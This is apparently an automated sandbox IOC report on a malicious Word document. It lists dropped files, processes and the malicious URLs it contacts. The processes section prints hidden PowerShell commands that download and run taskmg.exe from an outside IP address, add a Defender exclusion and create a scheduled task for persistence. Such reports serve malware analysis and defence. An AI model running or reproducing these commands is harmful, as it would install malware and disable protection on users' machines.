IOC Report

loading gif

Files

File Path
Type
Category
Malicious
Reconfirm The Details.doc
Rich Text Format data, unknown version
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
downloaded
malicious
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmp3054.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\taskmg.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3263CED7.png
370 sysV pure executable
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\867A2AEC.wmf
Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005"
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4DFB1A07-CB4F-472F-B236-A3BF6A79B957}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6B5678D1-0902-45B5-A7D8-811025AE74F7}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C8C94021-4E02-4955-8AF8-3AD414138F04}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Chrome\Default\Cookies
SQLite 3.x database, last written using SQLite version 3032001
dropped
clean
C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Firefox\Profiles\7xwghk55.default\cookies.sqlite
SQLite 3.x database, user version 7, last written using SQLite version 3017000
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Reconfirm The Details.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:14:15 2021, length=393215, window=hide
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
Little-endian UTF-16 Unicode text, with no line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QOH1SFJ01YDJGSRFKM6L.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SSOY99TCA63S5VSW1UNJ.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SX36BOTN39J9C9J03BTG.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U7TXBSPCBZC5YKNEVYY5.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
data
dropped
clean
C:\Users\user\Desktop\~$confirm The Details.doc
data
dropped
clean
There are 17 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe'
malicious
C:\Users\user\AppData\Roaming\taskmg.exe
"C:\Users\user\AppData\Roaming\taskmg.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp
malicious
C:\Users\user\AppData\Roaming\taskmg.exe
C:\Users\user\AppData\Roaming\taskmg.exe
malicious
C:\Windows\System32\notepad.exe
C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
malicious
C:\Windows\System32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
clean

URLs

Name
IP
Malicious
httP://173.232.2
unknown
malicious
httP://173.232.204.89/taskmg.
unknown
malicious